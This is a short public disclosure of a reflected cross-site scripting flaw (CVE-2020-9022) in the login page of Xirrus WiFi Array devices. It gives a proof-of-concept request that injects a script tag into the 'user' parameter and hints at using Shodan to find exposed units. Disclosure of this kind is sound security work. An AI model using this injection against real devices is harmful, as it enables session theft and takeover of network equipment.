Xirrus WiFi - XSS - (CVE-2020-9022)

https://sku11army.blogspot.com/2020/01/xirrus-xirrus-wifi-xss.html ### - Xirrus WiFi - XSS - (CVE-2020-9022) [](https://images.seebug.org/1583460215585-w331s) The "Xirrus XR520 WiFi Array/Xirrus XR620 WiFi Array/Xirrus XR2436 WiFi Array/Xirrus XH2-120 WiFi Array" devices are vulnerable to a Cross-Site Scripting Reflected at login, specifically in the " ** _user_** " parameter. **Affected Devices:** - **_Xirrus XR520 WiFi Array_** - **_Xirrus XR620 WiFi Array_** - **_Xirrus XR2436 WiFi Array_** - **_Xirrus XH2-120 WiFi Array_** [](https://images.seebug.org/1583460218923-w331s) The following java script code is injected into the " _ **user**_ " parameter GET Request https://192.x.x.x/cgi-bin/ViewPage.cgi?wmi_login=1&user=admin ** _< script>alert('XSS')</script>_**&pass=admin&click_to_login=login [](https://images.seebug.org/1583460221149-w331s) POST [](https://images.seebug.org/1583460223803-w331s) [](https://images.seebug.org/1583460229693-w331s) [](https://images.seebug.org/1583460247834-w331s) Shodan [](https://images.seebug.org/1583460256560-w331s) **_CVE-2020-9022_** By: @Linuxmonr4